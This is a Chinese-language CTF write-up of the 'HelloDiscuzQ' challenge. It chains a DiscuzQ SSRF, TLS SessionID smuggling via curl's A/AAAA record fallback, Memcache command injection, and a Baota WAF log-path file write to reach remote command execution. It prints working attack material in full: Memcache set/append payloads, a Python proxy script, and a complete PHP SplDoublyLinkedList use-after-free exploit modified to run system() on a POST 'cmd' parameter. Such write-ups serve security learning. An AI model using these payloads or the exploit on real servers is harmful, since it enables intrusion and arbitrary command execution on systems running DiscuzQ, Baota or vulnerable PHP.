概述
之前看到研究院的同学写了一篇关于今年 Blackhat 议题的分析 https://mp.weixin.qq.com/s/GT3Wlu_2-Ycf_nhWz_z9Vw,对其中的原理比较感兴趣,但在复现时发现了一些问题。自己经过实验之后发现了一种新的利用方式。再结合自己之前在审计 DiscuzQ 代码时发现的一个 HTTP/HTTPS 的无回显SSRF 点结合宝塔的 WAF 所依赖的 Memcache 形成一套完整的题目,也算是该种新利用方式的复现环境了。
背景
何谓 SSRF
由此可见,我们可以利用 SSRF 漏洞来让服务器作为一个代理,让漏洞服务器去访问我们想让他访问的东西,即便这个东西是只有漏洞服务器本身能访问,例如与漏洞服务器同处一个内网的数据库等。
DNS Rebinding
简单来说,就是在请求时会先验证请求地址中的域名解析结果,如果为合法地址(例如外网地址)则发送出正式请求,否则就拒绝发出。
例如,在程序请求一个URL 时,程序会先提取出其中的 Host,判断其是否为外网地址,如果是则正式发出请求。
这里就最多存在两次 DNS 解析,一次是程序提取出 Host 进行的一次解析,第二次则是正式发出请求时会再做一次解析。
为什么说是最多存在两次呢,因为很多系统有 DNS 缓存,会依据请求的 TTL(Time To Live,存活时间,下同)进行缓存,例如这一个域名记录的 TTL 是 600 秒,第一次请求与第二次请求之间间隔不足 600 秒的话第二次请求就会直接用第一次请求的结果,那么这两者就当然是一样的了。
那么我们可不可以将这个时间设置为 0,在第一期请求时是一个结果,第二次再做请求时则再去请求一次,这一次请求则返回另外一个结果呢?大部分 DNS 服务商不会允许你将 TTL 设置为0,但如果你将 NS 设置为你自己的服务器之后再尝试做请求的话就可以返回 TTL 为 0 的结果,从而强制客户端请求两次解析,两次解析你服务端也可以控制返回不同的结果了。
TLS SSRF
我们可以利用 TLS 协议的 SNI (服务端名称指示)来进行 SSRF。原理为让服务器对外发出 TLS 包,里面含有我们想让其发送的东西。具体可以参见 https://news.ycombinator.com/item?id=17956285 ,但这种方式的局限性比较大,一个是我测试到的客户端(比如 curl 等等)都发不出这种请求。
关于 When TLS hacks You
结合上面提到的研究院小伙伴的文章以及 https://i.blackhat.com/USA-20/Wednesday/us-20-Maddux-When-TLS-Hacks-You.pdf 原议题的 PPT,我们可以发现一种新的攻击方式,即利用 TLS 中的 SessionID 结合 DNS 重绑定进行攻击。
大致流程如下:
- 利用服务器发起一个 HTTPS 请求。
- 请求时会发起一个 DNS 解析请求,DNS 服务器回应一个 TTL 为 0 的结果,指向攻击者的服务器。
- 攻击者服务器响应请求,并返回一个精心构造过的 SessionID,并延迟几秒后回应一个跳转。
- 客户端接收到这个回应之后会进行跳转,这次跳转时由于前面那一次 DNS 解析的结果为 TTL 0,则会再次发起一次解析请求,这次返回的结果则会指向 SSRF 攻击的目标(例如本地的数据库)。
- 因为请求和跳转时的域名都没有变更,本次跳转会带着之前服务端返回的精心构造过的 SessionID 进行,发送到目标的那个端口上。
- 则达到目的,成功对目标端口发送构造过的数据,成功 SSRF。
但在实际测试中,我们发现,当第一次请求完成之后,进行跳转时所发出的请求并不会再做一次解析请求,经过探究我们发现是因为这些客户端(例如 curl)中对 DNS 解析结果做了强制缓存,在第二次请求时直接使用第一次解析的结果,导致第二次应该按照 DNS TTL 0 的解析结果发出的第二次解析没有进行。
curl 如此,所有依赖 libcurl 的请求库亦然,那么对于这种情况我们应该如何进行攻击利用呢?
接下来以西湖论剑 2020 的一道 Web 题 HelloDiscuzQ 为例子,来介绍一下利用 A 记录和 AAAA 记录结合 TLS 进行 SSRF。
题目解析
题目名称
HelloDiscuzQ
复现地址
http://hellodiscuzq.xhlj.wetolink.com/
所涉及知识点
- 代码审计
- 新型 SSRF
- Lua 语言特性
- PHP bypass disable function
步骤
- 打开靶机,是 DiscuzQ 系统。
2. 那么就到官网下载代码审计下。
下载之后开始审计,发现其中在 app/Api/Controller/Analysis/ResourceAnalysisGoodsController.php 这里有一个 SSRF 点,根据输入地址的不同判断之后进入 guzzlehttp(底层调用 curl 相关函数) 和 file_get_contents 的请求分支。
结合前面的代码来看,虽然此处请求 URL 可控,但限制死了只允许访问 http 和 https 的地址,其他地址无法访问,file_get_contents 和 guzzlehttp 也无法跳转到 gopher 以及 file 等协议。
来调用这个 API 试试,这个 API 的地址是这个。
直接请求,要求验证。
那么就在网站上注册一个用户,尝试利用 https://discuz.com/api-docs/v1/Login.html 这里的接口登录一下获取凭证。
拷贝 access_token 到 Authorization 头,再对上面那个 API 发起请求让他去请求别的页面。
点击发送,就会发送请求到自己的 requestbin 上。
3.那么先利用 SSRF 来探测一下本地有什么服务。
本地其他未开放端口都会回显 Connection Refused。
但对于开放的端口,则是其他回显。
综合探测以及回显结果,可以发现 80,888,8888,3306,11211 端口开放。
判断有 http 服务器,mysql 服务器,memcache 服务器,且为宝塔面板搭建。
4.那么如何判断 HTTP 服务器的种类以及反向代理过去的 Host 呢?
看 HTTP 响应头?不行,因为那是反向代理的响应头。
那么就来访问一下一些特定的页面看看回显,比如,尝试把他的错误页面搞出来。
利用 SSRF 来访问 80 端口上 HTTP 服务器上的一些不存在文件看看。
有部分内容回显,根据这些综合比对 Apache,Nginx 等服务器的 404 页面确定为 Apache。
服务器类型有了,对于反向代理发过去宝塔的 Apache 的 Host 如何获取呢,我们可以通过反向代理访问 .htaccess 文件,看看后端返回的错误页面。
http://hellodiscuzq.xhlj.wetolink.com/.htaccess
从这个页面中除了可以获知服务器为 Apache 服务器之外,也可得知反向代理的主机头为 10.20.124.208。
5.再来测试一下是否有启用 WAF。
http://hellodiscuzq.xhlj.wetolink.com/pages/topic/index?id=2%20or%201=1
看到拦截页面,为宝塔 WAF。
结合上面看到的服务器为 Apache 服务器,推测此 WAF 为宝塔 Apache WAF,运行需要依赖 Memcache 服务器,所以解释了为什么会有 Memcache 服务器。
6.来审计一下宝塔 Apache WAF的代码看看。
看到 /www/server/btwaf/httpd.lua 宝塔 Apache WAF 的主文件。
看到 307 行的调用,作用为拦截之后记录到日志文件里。
追踪看 write_to_file 这个函数,看到其文件路径为拼接得来。
其中参与拼接的 server_name 为全局变量,在运行起始时有定义。
因为在宝塔中一个网站可以绑定多个域名,则在 get_server_name 函数中会先将请求的 Host 与缓存进行匹配,获取到最终是哪个网站,如果缓存中有则直接返回网站的主 Host。
7.那么我们就可以在缓存中写入一个恶意的主机名,使其拼接到路径中,造成任意文件写入。
且内容我们也同样可控,前面的 uri,ua 等写入内容我们均可控。
8.最终的攻击路径如下:
- SSRF 攻击 Memcache,将恶意的 Host 写入 Memcache。
- 使用恶意请求去访问网站,即可触发日志记录,拼接路径之后造成任意文件写入拿到权限。
9.首先是 SSRF 攻击 Memcache。
因为我们之前看到的是只允许访问 HTTP/HTTPS 的 SSRF 点,我们就要尝试利用 HTTPS 中 TLS 的 SessionID 去攻击 Memcache 进而写入我们想要的 Host。
预期写入的内容为
- key:10.20.124.208
- vaue: ../../wwwroot/10.20.124.208/public/a.php\x00(EOF)
路径可从自己安装的宝塔以及 DiscuzQ 中获得。
为什么会有一个 \x00 EOF 字符呢,因为在我们上面看到的代码中 server_name 位于字符串中间位置,前后还有内容,在 Lua 中我们可以利用 \x00 EOF 字符来截断它,从而让他准确地写入我们想要写入的命令。
那么写入 Memcache 的命令如何呢?
按理来说应该是
set 10.20.124.208
../../wwwroot/10.20.124.208/public/a.php\x00
但因为 SessionID 只能为 32 字节长,所以我们需要分段写入。
Memcache 中提供了追加写入的命令 append,我们可以利用这个来绕过长度的限制写入我们的路径。
最终我们的命令集如下。
session_id = [
"\nset 10.20.124.208 0 0 5\n../..\r\n",
"\nappend 10.20.124.208 0 0 2\n/w\r\n",
"\nappend 10.20.124.208 0 0 2\nww\r\n",
"\nappend 10.20.124.208 0 0 2\nro\r\n",
"\nappend 10.20.124.208 0 0 2\not\r\n",
"\nappend 10.20.124.208 0 0 2\n/1\r\n",
"\nappend 10.20.124.208 0 0 2\n0.\r\n",
"\nappend 10.20.124.208 0 0 2\n20\r\n",
"\nappend 10.20.124.208 0 0 2\n.1\r\n",
"\nappend 10.20.124.208 0 0 2\n24\r\n",
"\nappend 10.20.124.208 0 0 2\n.2\r\n",
"\nappend 10.20.124.208 0 0 2\n08\r\n",
"\nappend 10.20.124.208 0 0 2\n/p\r\n",
"\nappend 10.20.124.208 0 0 2\nub\r\n",
"\nappend 10.20.124.208 0 0 2\nli\r\n",
"\nappend 10.20.124.208 0 0 2\nc/\r\n",
"\nappend 10.20.124.208 0 0 2\na.\r\n",
"\nappend 10.20.124.208 0 0 2\nph\r\n",
"\nappend 10.20.124.208 0 0 2\np\x00\r\n",
]
前面都有 \n 后面也有 \r\n,标记 Memcache 命令的开始和结束。
那么如何让 SSRF 漏洞点每一次请求都会先请求我们的恶意 TLS 服务器,将这些 SessionID 拿到再去请求 Memcache 服务器。
那么这里就需要利用到 CURL 中一种特殊的请求行为了,也就是对同时具有 A 记录和 AAAA 记录的域名的解析行为。
在 CURL 中,对于一个域名,如果同时具有 A 记录和 AAAA 记录,那么 CURL 会去优先请求 AAAA 或者 A 记录所指向的地址,如果这些地址无法连接,则会尝试连接同时得到的 A 记录或者 AAAA 记录。
在某些情况下,会出现:
AAAA 记录地址不通,会连接到 A 记录地址上。
A记录地址不通,会连接到 AAAA 记录地址上。
例如,
第一个地址不通,则会尝试第二个地址。
那么我们可以这样做:
- 第一次让 CURL 去访问恶意的 HTTPS 服务器,拿到一个恶意的 SessionID
- 然后使恶意的 HTTPS 服务器无法接收新的连接
- 这时恶意的 HTTPS 给出第一次返回的结果,使其进行同域名跳转
- 跳转时会尝试进行新连接,发现恶意的HTTPS 服务器无法连接。
- 则会尝试连接这个域名下的其他记录所指向的地址,并带上 SessionID
成功将恶意的数据发送到我们想要的目标上。
那么来实际操作下。
首先将恶意的 HTTPS 服务器搭建起来,服务器源码在这里。
https://github.com/glzjin/tlslite-ng
tests 下直接运行 ./httpsserver.sh,自己复现注意替换证书等相关设置,证书自己申请。
然后我们还要让他连接一次以后无法被第二次连接,就搭建一个代理来完成,代理脚本如下:
# coding=utf-8
import socket
import threading
source_host = '127.0.0.1'
source_port = 11210
desc_host = '0.0.0.0'
desc_port = 11211
def send(sender, recver):
while 1:
try:
data = sender.recv(2048)
except:
break
print "recv error"
try:
recver.sendall(data)
except:
break
print "send error"
sender.close()
recver.close()
def proxy(client):
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.connect((source_host, source_port))
threading.Thread(target=send, args=(client, server)).start()
threading.Thread(target=send, args=(server, client)).start()
def main():
proxy_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
proxy_server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
proxy_server.bind((desc_host, desc_port))
proxy_server.listen(50)
print "Proxying from %s:%s to %s:%s ..."%(source_host, source_port, desc_host, desc_port)
conn, addr = proxy_server.accept()
print "received connect from %s:%s"%(addr[0], addr[1])
threading.Thread(target=proxy, args=(conn, )).start()
if __name__ == '__main__':
main()
代理 11211 端口到 11210 端口,直接 python 运行即可。
接下来别忘了将 A 记录 和 AAAA 记录给域名设置上。
AAAA 记录指向自己可以控制的恶意 HTTPS 服务器,A 记录指向 127.0.0.1。AAAA 记录值填写的虽然是 IPV6 的地址,但其实访问还是走的 IPV4 的通道,这类地址可通过 https://www.ultratools.com/tools/ipv4toipv6Result?address=120.92.217.158 得来。
这种应对的是 AAAA 记录优先的情况,如果出现 A 记录优先的情况请注意随机应变。
万事具备,那么就来试一试了。
触发 SSRF,可以看到其被请求之后拿到了恶意的 SessionID,之后就会带着这些数据去请求本地的 memcache 了。(如果没有请求到自己的服务器就多点几次)
然后再次把代理脚本跑起来。
继续请求。
继续写数据进去。
如此往复,直到把所有数据都写过去。
10.然后就可以用一个恶意请求触发 WAF 日志。
为了避免我们之后的代码被拦截,这里使用 base64 编码传输。
11. 尝试访问 a.php,可以看到文件已经成功写入。
http://hellodiscuzq.xhlj.wetolink.com/a.php
12.尝试执行一下 phpinfo 试试。
先将 phpinfo(); base64 编码。
然后发送出去。
13.简单看一下,有 disable_function 和 open_basedir,需要绕过。
PHP 版本为 7.4.10,则使用 https://ssd-disclosure.com/ssd-advisory-php-spldoublylinkedlist-uaf-sandbox-escape/ 这里的脚本进行绕过。
将其编码为 base64。
#
# PHP SplDoublyLinkedList::offsetUnset UAF
# Charles Fol (@cfreal_)
# 2020-08-07
# PHP is vulnerable from 5.3 to 8.0 alpha
# This exploit only targets PHP7+.
#
# SplDoublyLinkedList is a doubly-linked list (DLL) which supports iteration.
# Said iteration is done by keeping a pointer to the "current" DLL element.
# You can then call next() or prev() to make the DLL point to another element.
# When you delete an element of the DLL, PHP will remove the element from the
# DLL, then destroy the zval, and finally clear the current ptr if it points
# to the element. Therefore, when the zval is destroyed, current is still
# pointing to the associated element, even if it was removed from the list.
# This allows for an easy UAF, because you can call $dll->next() or
# $dll->prev() in the zval's destructor.
#  
#
error_reporting(E_ALL);
define('NB_DANGLING', 200);
define('SIZE_ELEM_STR', 40 - 24 - 1);
define('STR_MARKER', 0xcf5ea1);
function i2s(&$s, $p, $i, $x=8)
{
    for($j=0;$j<$x;$j++)
    {
        $s[$p+$j] = chr($i & 0xff);
        $i >>= 8;
    }
}
function s2i(&$s, $p, $x=8)
{
    $i = 0;
    for($j=$x-1;$j>=0;$j--)
    {
        $i <<= 8;
        $i |= ord($s[$p+$j]);
    }
    return $i;
}
class UAFTrigger
{
    function __destruct()
    {
        global $dlls, $strs, $rw_dll, $fake_dll_element, $leaked_str_offsets;
        #"print('UAF __destruct: ' . "\n");
        $dlls[NB_DANGLING]->offsetUnset(0);
        
        # At this point every $dll->current points to the same freed chunk. We allocate
        # that chunk with a string, and fill the zval part
        $fake_dll_element = str_shuffle(str_repeat('A', SIZE_ELEM_STR));
        i2s($fake_dll_element, 0x00, 0x12345678); # ptr
        i2s($fake_dll_element, 0x08, 0x00000004, 7); # type + other stuff
        
        # Each of these dlls current->next pointers point to the same location,
        # the string we allocated. When calling next(), our fake element becomes
        # the current value, and as such its rc is incremented. Since rc is at
        # the same place as zend_string.len, the length of the string gets bigger,
        # allowing to R/W any part of the following memory
        for($i = 0; $i <= NB_DANGLING; $i++)
            $dlls[$i]->next();
        if(strlen($fake_dll_element) <= SIZE_ELEM_STR)
            die('Exploit failed: fake_dll_element did not increase in size');
        
        $leaked_str_offsets = [];
        $leaked_str_zval = [];
        # In the memory after our fake element, that we can now read and write,
        # there are lots of zend_string chunks that we allocated. We keep three,
        # and we keep track of their offsets.
        for($offset = SIZE_ELEM_STR + 1; $offset <= strlen($fake_dll_element) - 40; $offset += 40)
        {
            # If we find a string marker, pull it from the string list
            if(s2i($fake_dll_element, $offset + 0x18) == STR_MARKER)
            {
                $leaked_str_offsets[] = $offset;
                $leaked_str_zval[] = $strs[s2i($fake_dll_element, $offset + 0x20)];
                if(count($leaked_str_zval) == 3)
                    break;
            }
        }
        if(count($leaked_str_zval) != 3)
            die('Exploit failed: unable to leak three zend_strings');
        
        # free the strings, except the three we need
        $strs = null;
        # Leak adress of first chunk
        unset($leaked_str_zval[0]);
        unset($leaked_str_zval[1]);
        unset($leaked_str_zval[2]);
        $first_chunk_addr = s2i($fake_dll_element, $leaked_str_offsets[1]);
        # At this point we have 3 freed chunks of size 40, which we can read/write,
        # and we know their address.
        print('Address of first RW chunk: 0x' . dechex($first_chunk_addr) . "\n");
        # In the third one, we will allocate a DLL element which points to a zend_array
        $rw_dll->push([3]);
        $array_addr = s2i($fake_dll_element, $leaked_str_offsets[2] + 0x18);
        # Change the zval type from zend_object to zend_string
        i2s($fake_dll_element, $leaked_str_offsets[2] + 0x20, 0x00000006);
        if(gettype($rw_dll[0]) != 'string')
            die('Exploit failed: Unable to change zend_array to zend_string');
        
        # We can now read anything: if we want to read 0x11223300, we make zend_string*
        # point to 0x11223300-0x10, and read its size using strlen()
        # Read zend_array->pDestructor
        $zval_ptr_dtor_addr = read($array_addr + 0x30);
    
        print('Leaked zval_ptr_dtor address: 0x' . dechex($zval_ptr_dtor_addr) . "\n");
        # Use it to find zif_system
        $system_addr = get_system_address($zval_ptr_dtor_addr);
        print('Got PHP_FUNCTION(system): 0x' . dechex($system_addr) . "\n");
        
        # In the second freed block, we create a closure and copy the zend_closure struct
        # to a string
        $rw_dll->push(function ($x) {});
        $closure_addr = s2i($fake_dll_element, $leaked_str_offsets[1] + 0x18);
        $data = str_shuffle(str_repeat('A', 0x200));
        for($i = 0; $i < 0x138; $i += 8)
        {
            i2s($data, $i, read($closure_addr + $i));
        }
        
        # Change internal func type and pointer to make the closure execute system instead
        i2s($data, 0x38, 1, 4);
        i2s($data, 0x68, $system_addr);
        
        # Push our string, which contains a fake zend_closure, in the last freed chunk that
        # we control, and make the second zval point to it.
        $rw_dll->push($data);
        $fake_zend_closure = s2i($fake_dll_element, $leaked_str_offsets[0] + 0x18) + 24;
        i2s($fake_dll_element, $leaked_str_offsets[1] + 0x18, $fake_zend_closure);
        print('Replaced zend_closure by the fake one: 0x' . dechex($fake_zend_closure) . "\n");
        
        # Calling it now
        
        print('Running system("'.$_POST[cmd].'");' . "\n");
        $rw_dll[1]($_POST[cmd]);
        print_r('DONE'."\n");
    }
}
class DanglingTrigger
{
    function __construct($i)
    {
        $this->i = $i;
    }
    function __destruct()
    {
        global $dlls;
        #D print('__destruct: ' . $this->i . "\n");
        $dlls[$this->i]->offsetUnset(0);
        $dlls[$this->i+1]->push(123);
        $dlls[$this->i+1]->offsetUnset(0);
    }
}
class SystemExecutor extends ArrayObject
{
    function offsetGet($x)
    {
        parent::offsetGet($x);
    }
}
/**
 * Reads an arbitrary address by changing a zval to point to the address minus 0x10,
 * and setting its type to zend_string, so that zend_string->len points to the value
 * we want to read.
 */
function read($addr, $s=8)
{
    global $fake_dll_element, $leaked_str_offsets, $rw_dll;
    i2s($fake_dll_element, $leaked_str_offsets[2] + 0x18, $addr - 0x10);
    i2s($fake_dll_element, $leaked_str_offsets[2] + 0x20, 0x00000006);
    $value = strlen($rw_dll[0]);
    if($s != 8)
        $value &= (1 << ($s << 3)) - 1;
    return $value;
}
function get_binary_base($binary_leak)
{
    $base = 0;
    $start = $binary_leak & 0xfffffffffffff000;
    for($i = 0; $i < 0x1000; $i++)
    {
        $addr = $start - 0x1000 * $i;
        $leak = read($addr, 7);
        # ELF header
        if($leak == 0x10102464c457f)
            return $addr;
    }
    # We'll crash before this but it's clearer this way
    die('Exploit failed: Unable to find ELF header');
}
function parse_elf($base)
{
    $e_type = read($base + 0x10, 2);
    $e_phoff = read($base + 0x20);
    $e_phentsize = read($base + 0x36, 2);
    $e_phnum = read($base + 0x38, 2);
    for($i = 0; $i < $e_phnum; $i++) {
        $header = $base + $e_phoff + $i * $e_phentsize;
        $p_type  = read($header + 0x00, 4);
        $p_flags = read($header + 0x04, 4);
        $p_vaddr = read($header + 0x10);
        $p_memsz = read($header + 0x28);
        if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
            # handle pie
            $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
            $data_size = $p_memsz;
        } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
            $text_size = $p_memsz;
        }
    }
    if(!$data_addr || !$text_size || !$data_size)
        die('Exploit failed: Unable to parse ELF');
    return [$data_addr, $text_size, $data_size];
}
function get_basic_funcs($base, $elf) {
    list($data_addr, $text_size, $data_size) = $elf;
    for($i = 0; $i < $data_size / 8; $i++) {
        $leak = read($data_addr + $i * 8);
        if($leak - $base > 0 && $leak < $data_addr) {
            $deref = read($leak);
            # 'constant' constant check
            if($deref != 0x746e6174736e6f63)
                continue;
        } else continue;
        $leak = read($data_addr + ($i + 4) * 8);
        if($leak - $base > 0 && $leak < $data_addr) {
            $deref = read($leak);
            # 'bin2hex' constant check
            if($deref != 0x786568326e6962)
                continue;
        } else continue;
        return $data_addr + $i * 8;
    }
}
function get_system($basic_funcs)
{
    $addr = $basic_funcs;
    do {
        $f_entry = read($addr);
        $f_name = read($f_entry, 6);
        if($f_name == 0x6d6574737973) { # system
            return read($addr + 8);
        }
        $addr += 0x20;
    } while($f_entry != 0);
    return false;
}
function get_system_address($binary_leak)
{
    $base = get_binary_base($binary_leak);
    print('ELF base: 0x' .dechex($base) . "\n");
    $elf = parse_elf($base);
    $basic_funcs = get_basic_funcs($base, $elf);
    print('Basic functions: 0x' .dechex($basic_funcs) . "\n");
    $zif_system = get_system($basic_funcs);
    return $zif_system;
}
$dlls = [];
$strs = [];
$rw_dll = new SplDoublyLinkedList();
# Create a chain of dangling triggers, which will all in turn
# free current->next, push an element to the next list, and free current
# This will make sure that every current->next points the same memory block,
# which we will UAF.
for($i = 0; $i < NB_DANGLING; $i++)
{
    $dlls[$i] = new SplDoublyLinkedList();
    $dlls[$i]->push(new DanglingTrigger($i));
    $dlls[$i]->rewind();
}
# We want our UAF'd list element to be before two strings, so that we can
# obtain the address of the first string, and increase is size. We then have
# R/W over all memory after the obtained address.
define('NB_STRS', 50);
for($i = 0; $i < NB_STRS; $i++)
{
    $strs[] = str_shuffle(str_repeat('A', SIZE_ELEM_STR));
    i2s($strs[$i], 0, STR_MARKER);
    i2s($strs[$i], 8, $i, 7);
}
# Free one string in the middle, ...
$strs[NB_STRS - 20] = 123;
# ... and put the to-be-UAF'd list element instead.
$dlls[0]->push(0);
# Setup the last DLlist, which will exploit the UAF
$dlls[NB_DANGLING] = new SplDoublyLinkedList();
$dlls[NB_DANGLING]->push(new UAFTrigger());
$dlls[NB_DANGLING]->rewind();
# Trigger the bug on the first list
$dlls[0]->offsetUnset(0);
最后发送上去,即可执行命令,这里为了方便将其中固定的 id 命令改为可变的 cmd 参数。
成功执行命令。
14.执行 /readflag 即可成功读取到 flag。
修复方式
- 对于 Curl:保持跳转之后解析以及访问行为一致,前面使用 A 记录访问的后面也应该使用 A 记录进行访问。
- 对于 DiscuzQ:基于业务场景对接口能访问的域名进行限制。
- 对于宝塔 WAF:写入前对路径做判断,同时想办法对 EOF 字符进行处理,不要受其影响。
总结
这种 SSRF 方式属于对 Blackcat 2020 上展示的利用 TLS 方法的升华,原方式由于 curl 等组件存在 DNS 缓存的原因,很多时候并不能利用成功。本文从另外一种角度进行阐述,利用网络请求时对存在 A 和 AAAA 记录的域名特殊的处理行为,将攻击者恶意构造的数据发送到目标上,从而达成攻击目的。
也希望各位选手在打 CTF 的时候也能多关注一些前沿的东西,对其作出自己的总结和思考,这样在这条路上才能走得更好更远。